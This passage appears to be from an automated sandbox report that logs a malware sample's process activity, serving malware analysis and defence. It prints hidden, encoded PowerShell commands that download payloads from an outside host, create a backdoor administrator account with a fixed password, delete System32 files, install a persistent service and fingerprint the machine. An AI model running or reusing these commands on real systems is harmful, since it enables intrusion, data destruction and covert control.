AGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEED.tmp" "c:\Users\user\AppData\Local\Temp\lgpiiklc\CSCCB9B20FB8C54707B662B684DAE4C90.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Company Booklet.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AOQBhAGUAYQA4AGIAZgA4ADMAMwBjADgANwA3ADAAOQA1ADkAZABiADcAYwA3ADIAOABmADQAYwBjAGQAYwBmAGMAOABmADQAZQA5ADMAMABhAGYANABkAGQANAA0AGUANgA1ADIAMQAzAGIAOQBiADQAYQA0ADcAOABlADUAZgA4ADYAZABjADEAMQA5AGEAMAA4ADEAMAAxADkANABhADkAMAA4ADcANAA0ADAAYgA3ADkAMAAzADgAMgBlAGIANwAxADEANQBhADkAZAA2AGEAMwAzAGIAYwAwADIAMAAyADgAZQA1ADUANgA3ADgAYQBiAGUAMAAyAGEAZAA0ADUAZAA0ADgAZQA5AGEAZgBhADkAMwBhAGYAOAAzADcANQAzADEAZQAzADUAYgAxAGMAOAA4AGUANgBiAGYAYwBhAGYAYQAyADcAZAA4ADIAZQBlADIANAA0ADIAMAAzAGIAOAA2AGEANgA1ADAAYQBjAGYAMwAzADQANgAwADYANwA2AGUAMQA5AGUANABkADUAMABjAGMAYgBmADcAYgA3ADkANQA1ADcANQBiADQAOAAxAGUAYwA0AGQANAAzACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakag
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaia